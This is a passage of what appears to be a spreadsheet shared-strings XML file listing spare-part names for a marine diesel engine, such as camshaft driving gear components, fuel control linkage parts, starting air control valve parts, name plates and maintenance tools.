    <t>RIM FOR CRANKSHAFT GEAR FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>CAMSHAFT GEAR ASSEMBLY FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>RIM FOR CAMSHAFT GEAR FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>HUB FOR CAMSHAFT GEAR FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>REAMER BOLT FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>IDLE GEAR ASSEMBLY FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>RIM FOR IDLE GEAR FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>BUSH (FREE END) FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>BACK METAL</t>
  </si>
  <si>
    <t>WHIGHT METAL</t>
  </si>
  <si>
    <t>BUSH (DRIVING END) FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>IDLE GEAR SHAFT FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>IDLE GEAR SHAFT SUPPORT FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>SUPPORT RING FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>LUBRICATION PIPE FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>UPPER GEAR HOUSING</t>
  </si>
  <si>
    <t>GEAR COVER FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>INSPECTION HPLE COVER FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>GASKET FOR CAMSHAFT DRIVING GEAR COVER</t>
  </si>
  <si>
    <t>THREAD END TAPER PIN FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>NUT FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>BLIND COVER FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>GASKET FOR CAMSHAFT DRIVING GEAR</t>
  </si>
  <si>
    <t>DOUBLE TONGUED WASHER</t>
  </si>
  <si>
    <t>GASKET  FOR GEAR CASE COVER</t>
  </si>
  <si>
    <t>CAMSHAFT HOUSING ASSEMBLY</t>
  </si>
  <si>
    <t>CAMSHAFT HOUSING</t>
  </si>
  <si>
    <t>CAMSHAFT HOUSING COVER</t>
  </si>
  <si>
    <t>GASKET FOR CAMSHAFT HOUSING COVER</t>
  </si>
  <si>
    <t>GASKET FOR CAMSHAFT HOUSING</t>
  </si>
  <si>
    <t>INSPECTION HOLE COVER FOT CAMSHAFT COVER</t>
  </si>
  <si>
    <t>STUD BOLT FOR CAMSHAFT HOUSING</t>
  </si>
  <si>
    <t>COVER FOR CAMSHAFT HOUSING</t>
  </si>
  <si>
    <t>SUPPORT FOR CAMSHAFT HOUSING</t>
  </si>
  <si>
    <t>BOLT FOR CAMSHAFT BEARING</t>
  </si>
  <si>
    <t>PLUG FOR CAMSHAFT</t>
  </si>
  <si>
    <t>GEAR SHAFT FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>EXHAUST VALVE DRIVING GEAR LOWER PART ASSEMBLY</t>
  </si>
  <si>
    <t>HOUSING(OIL CYLINDER) FOR EXHAUST VALVE DRIVUNG GEAR LOWER PART</t>
  </si>
  <si>
    <t>ROLLER GUIDE FOR EXHAUST VALVE DRIVING GEAR LOWER PART</t>
  </si>
  <si>
    <t>PISTON FOR EXHAUST VALVE DRIVING GEAR LOWER PART</t>
  </si>
  <si>
    <t>PISTON RING FOR EXHAUST VALVE DRIVING GEAR LOWER PART</t>
  </si>
  <si>
    <t>THRUST PIECE (UPPER) FOR EXHAUST VALVE DRIVING GEAR LOWER PART</t>
  </si>
  <si>
    <t>GUIDE PIN FOR EXHAUST VALVE DRIVING GEAR LOWER PART</t>
  </si>
  <si>
    <t>RELIEF VALVE FOR EXHAUST VALVE DRIVING GEAR</t>
  </si>
  <si>
    <t>PUMP STAND</t>
  </si>
  <si>
    <t>GUIDE PIN FOR FUEL OIL INJECTION PUMP DRIVING GEAR</t>
  </si>
  <si>
    <t>ADJUSTING SCREW  FOR ROCKER ARM</t>
  </si>
  <si>
    <t>FUEL OIL DRAIN PROTECTOR</t>
  </si>
  <si>
    <t>COVER FOR FUEL INJECTION PUMP DRIVING GEAR</t>
  </si>
  <si>
    <t>GASKET FOR FUEL OIL INJECTION PUMP DRIVING GEAR</t>
  </si>
  <si>
    <t>ORIFICE JOINT FOR F.O. PUMP L.O. INLET</t>
  </si>
  <si>
    <t>SLOTTED SET SCREW</t>
  </si>
  <si>
    <t>FUEL OIL PUMP ASSEMBLY</t>
  </si>
  <si>
    <t>PLUNGER ASSEMBLY</t>
  </si>
  <si>
    <t>DELIVERY VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>DELIVERY VALVE HOLDER</t>
  </si>
  <si>
    <t>DELIVERY SPRING</t>
  </si>
  <si>
    <t>PLUNGER SPRING</t>
  </si>
  <si>
    <t>WASHER FOR FUEL INJECTION PUNP AIR VENT</t>
  </si>
  <si>
    <t>BARREL SET BOLT</t>
  </si>
  <si>
    <t>POINTER FOR FUEL INJECTION PUMP</t>
  </si>
  <si>
    <t>SUCTION PIPE CONNECTOR</t>
  </si>
  <si>
    <t>SET BOLT OF CONNECTOR</t>
  </si>
  <si>
    <t>VINYL CAP FOR FUEL INJECTION PUMP</t>
  </si>
  <si>
    <t>AXIAL VIBRATION DAMPER ASSEMBLY</t>
  </si>
  <si>
    <t>CASING ASSEMBLY FOR CRANKSHAFT AXIAL VIBRATION DAMPER</t>
  </si>
  <si>
    <t>MANEUVRING HANDLE ASSEMBLY</t>
  </si>
  <si>
    <t>MAIN BODY FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>LEVER FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>BRACKET FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>COVER FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>FUEL HANDLE FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>PIN FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>FUEL HANDLE SHAFT CENTER FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>SPRING FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>POINTER FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>LIMIT SWITCH FIXING BRACKET FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>PILOT VALVE FOR STARTING AIR</t>
  </si>
  <si>
    <t>PIROT VALVE FOR REVERSING AIR</t>
  </si>
  <si>
    <t>NEEDLE BEARING FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>NEEDLE BEARING FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>DISTANCE PIECE FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>DISTANCE PIECE FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>SCREW PIN FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>GUIDE PIECE FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>SHAFT FOR REVERSING HANDLE FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>NAME PLATE FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>FIXING PIN FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>NEME PLATE FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>HANDLE FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>BUTTON FOR MANEUVERING DEVICE</t>
  </si>
  <si>
    <t>LOCKING PLATE FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>STOPPER FOR MANEUVERING HANDLE</t>
  </si>
  <si>
    <t>WING BOLT</t>
  </si>
  <si>
    <t>ASSEMBLY FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>PLATE FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>BRACKET FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>SPRING BOX</t>
  </si>
  <si>
    <t>AIR CYLINDER FOR F.O. CONTROL LINKAGE</t>
  </si>
  <si>
    <t>NUT FOR F.O. CONTROL LINKAGE</t>
  </si>
  <si>
    <t>PIN FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>LOCK PIN FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>SPRING FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>NAME PLATE FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>DESTANCE PIECE FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>DISTANCE PIECE FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>WASHER FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>CAP FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>SCALE PLATE FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>BRACKET (SCALE PLATE) FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>PARALLEL KEY FOR FO. CONTROL LINKAGE</t>
  </si>
  <si>
    <t>FO. PUMP CONTROL LINKAGE ASSEMBLY</t>
  </si>
  <si>
    <t>BEARING (FOR DRIVING END) FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>BEARING (FOR FREE END) FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>SHAFT (FOR ROLLER) FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>BEARING (FOR ROLLER) FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>SPRING CARRIER FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>BUSH FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>NEEDLE BEARING FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>BEARING (FOR LOCKING) FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>SHAFT (FOR DRIVING END) FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>SHAFT (FOR FREE END) FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>SHAFT (FOR LOCKING) FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>ROLLER FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>BOLT (FOR ROLLER) FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>PIN FOR FO CONTROL LINKAGE</t>
  </si>
  <si>
    <t>FO.RACK TRANSMITTER                     ASSEMBLY</t>
  </si>
  <si>
    <t>TRANSMITTER SUPPORT</t>
  </si>
  <si>
    <t>F.O TRANSMITTER COVER</t>
  </si>
  <si>
    <t>F.O TRANSMITTER GEAR</t>
  </si>
  <si>
    <t>F.O TRANSMITTER PINION</t>
  </si>
  <si>
    <t>HOUSING  FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>BEARING SUPPORT FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>DRIVING GEAR SHAFT FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>DRIVING GEAR (LARGE) FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>DRIVING GEAR (SMALL) FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>TURNING DISC FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>COVER FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>BUSH FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>TURNING DISC STOPPER FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>ADJUSTING PLATE FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>SPECIAL FITTING FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>SPRING FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>KEY FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>BLIND COVER FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>CHECK VALVE ASSEMBLY FOR STARTING AIR CONTROL DRAIN</t>
  </si>
  <si>
    <t>SPECIAL FITTING</t>
  </si>
  <si>
    <t>STEEL BALL FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>CHECK VALVE FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>SLOTTED AND CASTLE NUT FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>PAWL WASHER FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>CAMSHAFT SHIFTING GEAR ASSEMBLY</t>
  </si>
  <si>
    <t>SERVO CYLINDER FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>THRUST HOLDER</t>
  </si>
  <si>
    <t>SERVO PISTON  FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>LIMIT SWITCH COVER FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>COVER FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>CLAMP FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>FILTER ELEMENT FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>LIMIT SWITCH FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>BRACKET (1) FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>BRACKET (2) FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>PLATE FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>STOPPER FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>NAME PLATE FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>RUBBER RING FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>WASHER FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>COPPER GASKET FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>SHIM FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>SAFETY DEVICE MAIN BODY FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>SPRING (OUT) FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>SPRING (IN) FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>SPRING TRAY (LOWER) FOR CAMSHAFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>POINTER FOR CAMSHFT SHIFTING GEAR</t>
  </si>
  <si>
    <t>FITTING PLATE  FOR CAMSHAFT SHIFTING GEAR LIMIT SWITCH</t>
  </si>
  <si>
    <t>OIL LEVEL GAUGE FOR OIL BOTTLE ASSEMBLY</t>
  </si>
  <si>
    <t>SCALE PLATE FOR OIL BOTTOLE ASSEMBLY</t>
  </si>
  <si>
    <t>CAMSHAFT HOUSING COVER FOR CAMSHAFT HAUSING</t>
  </si>
  <si>
    <t>GEAR BOX FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>GEAR SHAFT FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>ADJUSTING LINER FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>ADJUSTING PLATE FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>GOVERNOR BOOSTER FOR TACHOMETER AND GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>LEAF SPRING FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>JOINT SHAFT FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>BRACKET FOR GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>PROXIMITY SWITCH FOR REVOLUTION COUNTER</t>
  </si>
  <si>
    <t>BRACKET FOR PROXIMITY SWITCH FOR REVOLUTION COUNTER</t>
  </si>
  <si>
    <t>GREASE COVER</t>
  </si>
  <si>
    <t>CYLINDER LO. DRIVING GEAR ASSEMBLY</t>
  </si>
  <si>
    <t>DRIVING GEAR ASSEMBLY FOR CYLINDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>GEAR BEARING SUPPORT FOR CYLINDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>SHAFT (LARGE)</t>
  </si>
  <si>
    <t>BUSH FOR CYLINDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>WASHER FOR CYLINDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>PLATE FOR CYLINDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>CHAIN CASE FOR CYLINDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>SUPPORT FOR CYLINDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>COVER FOR CYLINDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>PLATE FOR CYLUNDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>OIL SEAL FOR CYLINDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>GASKET FOR CYLINDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>CHAIN GUIDE BRACKET FOR CYLINDER LUB. OIL DRIVING GEAR</t>
  </si>
  <si>
    <t>CHAIN GUIDE</t>
  </si>
  <si>
    <t>SPLIT TAPER PIN</t>
  </si>
  <si>
    <t>ARRANGEMENT OF LUBRICATING OIL STUD</t>
  </si>
  <si>
    <t>LUBRICATING OIL STUD ASSEMBLY FOR CYLINDER LINER</t>
  </si>
  <si>
    <t>NOZZLE VALVE</t>
  </si>
  <si>
    <t>TIGHTENING BAR</t>
  </si>
  <si>
    <t>CONE WASHER</t>
  </si>
  <si>
    <t>CHECK VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>SPRING  FOR CYLINDER LO. STUD</t>
  </si>
  <si>
    <t>TURNING GEAR ASSEMBLY</t>
  </si>
  <si>
    <t>TURNING GEAR (WITH MOTOR)</t>
  </si>
  <si>
    <t>3 WAY VALVE</t>
  </si>
  <si>
    <t>EXHAUST VALVE GRINDING MACHINE</t>
  </si>
  <si>
    <t>SPECIAL BOSS</t>
  </si>
  <si>
    <t>BYPASS PIPE FOR CYLINDER COOLING WATER</t>
  </si>
  <si>
    <t>ORIFICE FOR CYLINDER COOLING WATER</t>
  </si>
  <si>
    <t>PIPE SUPPORT ASSEMBLY (EXHAUST SIDE)</t>
  </si>
  <si>
    <t>OUTLET MAIN PIPE OF CYLINDER COOLING WATER</t>
  </si>
  <si>
    <t>OUTLET BRANCH PIPE OF CYLINDER COOLING WATER</t>
  </si>
  <si>
    <t>16K WELDING PIPE FLANGES</t>
  </si>
  <si>
    <t>FUEL OIL DAMPER</t>
  </si>
  <si>
    <t>CYLINDER FOR FUEL OIL DAMPER</t>
  </si>
  <si>
    <t>PISTON FOR FUEL OIL DAMPER</t>
  </si>
  <si>
    <t>COVER FOR FUEL OIL DAMPER</t>
  </si>
  <si>
    <t>STOP BOLT FOR FUEL OIL DAMPER</t>
  </si>
  <si>
    <t>GASKET FOR FUEL OIL DAMPER</t>
  </si>
  <si>
    <t>SPRING FOR FUEL OIL DAMPER</t>
  </si>
  <si>
    <t>STUD BOLT FOR FUEL OIL DAMPER</t>
  </si>
  <si>
    <t>CAP SEAL FOR FUEL OIL DAMPER</t>
  </si>
  <si>
    <t>FUEL OIL PIPE                           BRACKET</t>
  </si>
  <si>
    <t>BRACKET FOR FUEL OIL PIPE</t>
  </si>
  <si>
    <t>FUEL OIL PIPE (OUTLET)COMPLETE</t>
  </si>
  <si>
    <t>PIPE ASSEMBLY FOR FUEL OIL OUTLET AND INLET BYPASS PIPE</t>
  </si>
  <si>
    <t>SPECIAL FLANGE FOR BYPASS PIPE</t>
  </si>
  <si>
    <t>IN. AND OUT. BRANCH PIPE OF FUEL OIL</t>
  </si>
  <si>
    <t>HIGH PRESSURE PIPE FOR FUEL INJECTION VALVE</t>
  </si>
  <si>
    <t>PIPE ASSEMBLY FOR F.O. HIGH PRESS. PIPE</t>
  </si>
  <si>
    <t>UNION NIPPLE FOR F.O. HIGH PRESS. PIPE</t>
  </si>
  <si>
    <t>STEAM TRACE PIPE OF IN. AND OUT. MAIN PIPE OF F.O.</t>
  </si>
  <si>
    <t>STEAM TRACE PIPE OF OUT. BRANCH PIPE OF F.O.</t>
  </si>
  <si>
    <t>STEAM TRACE PIPE OF IN. BRANCH PIPE OF F.O.</t>
  </si>
  <si>
    <t>INLET MAIN PIPE OF STARTING AIR</t>
  </si>
  <si>
    <t>SOCKET WELDING TYPE FLANGE</t>
  </si>
  <si>
    <t>FLANGE FOR SHORT PIPE OF STARTING AIR DRAIN SAPARATOR</t>
  </si>
  <si>
    <t>FLANGE FOR STARTING AIR DRAIN SEPARATOR</t>
  </si>
  <si>
    <t>STEEL BALL</t>
  </si>
  <si>
    <t>REDUCING VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>BODY FOR REDUCING VALVE</t>
  </si>
  <si>
    <t>SPRING GUIDE FOR REDUCING VALVE</t>
  </si>
  <si>
    <t>VALVE STEM FOR REDUCING VALVE</t>
  </si>
  <si>
    <t>SPRING RETAINER FOR REDUCING VALVE</t>
  </si>
  <si>
    <t>BUSH FOR REDUCING VALVE</t>
  </si>
  <si>
    <t>NUT FOR REDUCING VALVE</t>
  </si>
  <si>
    <t>SPRING FOR REDUCING VALVE</t>
  </si>
  <si>
    <t>CONTROL AIR SYSTEM DIAGRAM              ELECTRIC-PNEUMATIC CONVERTOR TYPE</t>
  </si>
  <si>
    <t>MAIN PIPE OF EXHAUST VALVE AIR SPRING</t>
  </si>
  <si>
    <t>BRANCH PIPE OF EXH. VALVE AIR SPRING</t>
  </si>
  <si>
    <t>BRANCH PIPE EXH. VALVE AIR SPRING</t>
  </si>
  <si>
    <t>HYDRAULIC PIPE FOR EXHAUST VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>NYDRAULIC PIPE FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>SPECIAL U BOLT</t>
  </si>
  <si>
    <t>PROTECTIVE PIPE OF HIGH PRESS. PIPE OF EXH. VALVE DRIVING OIL</t>
  </si>
  <si>
    <t>PROTECTION PIPE</t>
  </si>
  <si>
    <t>STUUFFING BOX DRAIN PIPE</t>
  </si>
  <si>
    <t>MIST VENT PIPE OF COLUMN</t>
  </si>
  <si>
    <t>SPECIAL U-BOLT FOR DRAIN CONN. PIPE OF FUEL VALVE</t>
  </si>
  <si>
    <t>DRAIN CONN. PIPE OF FUEL VALVE</t>
  </si>
  <si>
    <t>FO. DRAIN BRANCH PIPE ASSEMBLY (FUEL VALVE)</t>
  </si>
  <si>
    <t>DRAIN BRANCH PIPE OF FUEL VALVE</t>
  </si>
  <si>
    <t>HOPPER FOR FO. VALVE DRAIN PIPE</t>
  </si>
  <si>
    <t>DRAIN BRANCH PIPE OF FUEL OIL PUMP</t>
  </si>
  <si>
    <t>FO. DRAIN MAIN PIPE ASSEMBLY (FO. PUMP)</t>
  </si>
  <si>
    <t>DRAIN MAIN PIPE OF FUEL OIL PUMP</t>
  </si>
  <si>
    <t>DRAIN PIPE OF FREE END OF FUEL OIL DAMPER</t>
  </si>
  <si>
    <t>HOPPER ASSEMBLY</t>
  </si>
  <si>
    <t>PIPE SUPPORT ASSEMBLY FOR CYLINDER LUBRICATOR DRIVING GEAR</t>
  </si>
  <si>
    <t>MINIATURE VALVE</t>
  </si>
  <si>
    <t>FLOAT SWITCH</t>
  </si>
  <si>
    <t>PUNCHING METAL</t>
  </si>
  <si>
    <t>STOPPER RING</t>
  </si>
  <si>
    <t>FLOAT SWITCH FOR A/C MISTDRAIN HIGHLEVEL</t>
  </si>
  <si>
    <t>DRAIN BRANCH PIPE OF EXH. VALVE DRIVING OIL</t>
  </si>
  <si>
    <t>DRAIN PIPE FOR AIR COOLER</t>
  </si>
  <si>
    <t>ORIFICE FOR DRAIN PIPE OF STARTING AIR</t>
  </si>
  <si>
    <t>BRACKET  FOR GAUGE BOARO</t>
  </si>
  <si>
    <t>NAME PLATE FOR AIR COOLER COOLING WATER</t>
  </si>
  <si>
    <t>NAME PLATE FOR FO. INLET</t>
  </si>
  <si>
    <t>NAME PLATE FOR FUEL OIL OUTLET</t>
  </si>
  <si>
    <t>CAUTION PLATE FOR FUEL PUMP LUBRICATION</t>
  </si>
  <si>
    <t>NAME PLATE FOR MOISTURE SEPARATOR DRAIN VALVE</t>
  </si>
  <si>
    <t>NAME PLATE FOR A/C COOLING WATER INLET</t>
  </si>
  <si>
    <t>CAUTION LABEL FOR FUEL CONTROL LINKAGE</t>
  </si>
  <si>
    <t>CAUTION PLATE FOR CYLINDER CW. DRAIN</t>
  </si>
  <si>
    <t>NAME PLATE FOR A/C COOLING WATER OUTLET</t>
  </si>
  <si>
    <t>NAME PLATE FOR LEAKAGE OIL TANK</t>
  </si>
  <si>
    <t>NAME PLATE FOR SCAVENGING TRANK DRAIN VALVE</t>
  </si>
  <si>
    <t>NAME PLATE FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>NAME PLATE FOR AIR COOLER CLEANING (STEAM)</t>
  </si>
  <si>
    <t>NAME PLATE FOR NUT TIGHTENING</t>
  </si>
  <si>
    <t>NAME PLATE  FOR CYLINDER HEAD EXHAUST VALVE REMOVAL (CW)</t>
  </si>
  <si>
    <t>NAME PLATE  FOR CYLINDER HEAD REMOVAL (CW)</t>
  </si>
  <si>
    <t>NAME PLATE  FOR CYLINDER LINER REMOVAL (CW)</t>
  </si>
  <si>
    <t>NAME PLATE FOR COCK (B-TYPE)</t>
  </si>
  <si>
    <t>NAME PLATE FOR VALVE</t>
  </si>
  <si>
    <t>NAME PLATE FOR AUXILIARY BLOWER DRAIN VALVE</t>
  </si>
  <si>
    <t>VALVE PANEL BRACKET</t>
  </si>
  <si>
    <t>HOLDING DAWN BOLT</t>
  </si>
  <si>
    <t>VIBRATION PROOF STAY ASSEMBLY</t>
  </si>
  <si>
    <t>CONNECTING PIECE FOR VIBRATION PROOF STAY</t>
  </si>
  <si>
    <t>BOLT FOR VIBRATION PROOF STAY</t>
  </si>
  <si>
    <t>SHIM FOR VIBRATION PROOF STAY</t>
  </si>
  <si>
    <t>NUT FOR HOLDING DOWN BOLT</t>
  </si>
  <si>
    <t>DISTANCE PIECE FOR VIBRATION PREVENTION</t>
  </si>
  <si>
    <t>GREASE GUN (MICRO HOSE)</t>
  </si>
  <si>
    <t>MICRO HOSE FOR GREASE GUN</t>
  </si>
  <si>
    <t>PAD FOR THRUST BEARING</t>
  </si>
  <si>
    <t>BORE GAUGE FOR CYLINDER LINER</t>
  </si>
  <si>
    <t>LIFTING TOOL ASSEMBLY FOR CYLINDER COVER</t>
  </si>
  <si>
    <t>AIRTIGHTNESS TOOL FOR PISTON</t>
  </si>
  <si>
    <t>DISTANCE PIECE  FOR MANEUVERING HANDLE DEVICE</t>
  </si>
  <si>
    <t>HYDRAULIC PUMP ASSEMBLY</t>
  </si>
  <si>
    <t>JOINT FOR TURBO AIR PUMP</t>
  </si>
  <si>
    <t>BLIND FLANGE FOR CYLINDER CUT TOOL</t>
  </si>
  <si>
    <t>STOPPER OF CUTING OFF TOOL FOR EXHAUST VALVE DRIVING GEAR AND FUEL PUMP</t>
  </si>
  <si>
    <t>STOPPER FOR TAKE OFF TOOL FOR CROSS-PIN</t>
  </si>
  <si>
    <t>DOUBLE PRE-TENSIONER TIE ROD</t>
  </si>
  <si>
    <t>FTPA _PARTS LIST</t>
  </si>
  <si>
    <t>MAINTENANCE INTERVALS / LIFETIME</t>
  </si>
  <si>
    <t>ENGINE COMPONENT PARTS LIST</t>
  </si>
  <si>
    <t>LIQUID SEALING AGENT SPEC.</t>
  </si>
  <si>
    <t>DISMANTLING DIMENSIONS</t>
  </si>
  <si>
    <t>OIL SCRAPER RING 2-PARTS</t>
  </si>
  <si>
    <t>OIL THROWER 2-PARTS</t>
  </si>
  <si>
    <t>POSITIONING PAD</t>
  </si>
  <si>
    <t>VALVE DRIVE</t>
  </si>
  <si>
    <t>LUBRICATING OIL NOZZLE</t>
  </si>
  <si>
    <t>COLLECTOR BLOCK</t>
  </si>
  <si>
    <t>WELD-ON UNION</t>
  </si>
  <si>
    <t>FLANGE WITH PISTON ROD</t>
  </si>
  <si>
    <t>INTERMEDIATE PIECE SERVO OIL</t>
  </si>
  <si>
    <t>CLAMPING FLANGE</t>
  </si>
  <si>
    <t>OVERLOAD RELAY</t>
  </si>
  <si>
    <t>EXTENSION SHAFT</t>
  </si>
  <si>
    <t>PROTECTION MODULE</t>
  </si>
  <si>
    <t>MAINTAINING CLAMP</t>
  </si>
  <si>
    <t>CURRENT TRANSFORMER</t>
  </si>
  <si>
    <t>AMPERE METER</t>
  </si>
  <si>
    <t>HOUR METER</t>
  </si>
  <si>
    <t>INDICATION LIGHT</t>
  </si>
  <si>
    <t>COLLAR SCREW</t>
  </si>
  <si>
    <t>PIPE DIAGRAM</t>
  </si>
  <si>
    <t>INSTRUMENT CONNECTION UNION</t>
  </si>
  <si>
    <t>FLANGED STOP COCK</t>
  </si>
  <si>
    <t>VENTING UNIT</t>
  </si>
  <si>
    <t>CLAMPING PIECE</t>
  </si>
  <si>
